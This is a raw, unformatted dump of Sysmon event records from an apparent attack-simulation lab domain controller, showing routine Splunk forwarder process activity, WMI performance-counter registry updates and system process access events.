Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6403F5E158109F660A4FDD73C1835D9,SHA256=B1D4914673A6DAEB55B321921A4D2987A0F552B98068BD44E0E244CA7302BE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:01.797{266CAFBE-655C-6064-4201-00000000AE01}6936NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\wbem\Performance\WmiApRpl.iniMD5=FFDEEA82BA4A5A65585103DD2A922DFE,SHA256=C20B11DFF802AA472265F4E9F330244EC4ACA81B0009F6EFCB2CF8A36086F390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.983{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=990A0A1CE8D3B3931859DEC59C5C871F,SHA256=A4DB73E56E879361330E32DBE6F334A24C12869FE34DCED29E881ED01E124E91,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.935{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:03.936{266CAFBE-656F-6064-4401-00000000AE01}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:02.999{266CAFBE-656E-6064-4301-00000000AE01}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 12241200x80000000000000009606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000009605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List25952 25958 25968 25978 25998 26042 26052 26090 26096 26112 13241300x80000000000000009604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x00006561) 13241300x80000000000000009603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x00006560) 13241300x80000000000000009602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x00006607) 13241300x80000000000000009601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x00006606) 13241300x80000000000000009600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x00006607) 13241300x80000000000000009599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x00006606) 23542300x80000000000000009598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.950{266CAFBE-655C-6064-4201-00000000AE01}6936NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\PerfStringBackup.TMPMD5=CE113E5C22BF5C94F0E20EDC21911A8F,SHA256=2C508A5B5CCA1729CB8848F04E75F5F0DF3244DC33FB99F0CEAAEA527A21F9A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.919{266CAFBE-655C-6064-4201-00000000AE01}6936NT AUTHORITY\SYSTEM\\?\C:\Windows\system32\wbem\WMIADAP.EXEC:\Windows\System32\PerfStringBackup.INIMD5=FE193A892289F5307681F00B4CA3AD8E,SHA256=3DE849701FECDD6631F36EC47E3C7B883B1B83BDC4A97A8DA46A9CC58ACC3CE8,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.803{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000009595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:04.801{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 10341000x80000000000000009594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.751{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.750{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.750{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:04.749{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6570-6064-4501-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 